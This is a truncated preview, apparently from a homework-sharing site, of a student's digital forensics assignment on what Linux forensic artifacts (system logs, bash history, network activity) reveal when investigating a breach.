IT411_ERIC_CLARKSON_UNIT_8_LAB

.docx

School

Purdue Global University *

*We aren’t endorsed by this school

Course

411

Subject

Information Systems

Date

Apr 3, 2024

Type

docx

Pages

7

Uploaded by BarristerRiverRook47

Report
1 Unit 8 Assignment IT411 Digital Forensics Eric Clarkson Purdue Global University Professor Louay Karadsheh October 17, 2023
2 What are some of the things that you can learn from the forensic artifacts from a Linux system? How can they be used to help piece together the puzzle after a breach has occurred? To investigate security incidents and uncover system vulnerabilities, digital forensic investigators employ several methodologies and tools. Forensic artifacts made by Linux systems are one of the most potent sources of information. After a breach, these artifacts can help investigators piece together the puzzle by offering significant information about system activities, user behavior, and potential security risks. Forensic artifacts created from Linux systems can reveal important information about system activity, user behavior, and potential security breaches. These artifacts can be utilized to investigate security incidents, discover system flaws, and track user behavior. This paper looks at some of the most important forensic artifacts that may be obtained from a Linux system, as well as how they can be used to investigate security issues. When researching a Linux system, system logs are among the most important artifacts to collect. They maintain a record of all system events, such as user logins, system events, and application activity. System logs usually reside in the /var/log/ directory and can be examined with the 'dmesg' and 'journalctl' commands. System log analysis can assist in identifying potential security events such as failed login attempts or unauthorized access to critical information.
3 Digital forensic investigators can uncover unusual actions that may have led to the security issue by reviewing system logs. They can, for example, examine for indications of brute force assaults, illegal access attempts, or changes to system settings that may have exposed vulnerabilities. Another essential artifact to gather is Bash history, which shows what commands were run on the system and by whom. Bash history is saved in the.bash_history file in the user's home directory. The bash history can be used to follow a user's activities and discover any suspicious or malicious commands that were run. This data can be utilized to identify insider risks as well as externally perpetrated attacks. By examining bash history, digital forensic investigators can uncover any unusual or malicious behavior that may have contributed to the security problem. They can also detect attempts to conceal illicit activity, such as deleting bash history files or running commands to wipe logs. Network activity can also be utilized to detect unusual activity like network scans and other potential security concerns. Netstat, tcpdump, and Wireshark are among the tools available in Linux for monitoring network activities. Analyzing network activity can assist in identifying
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help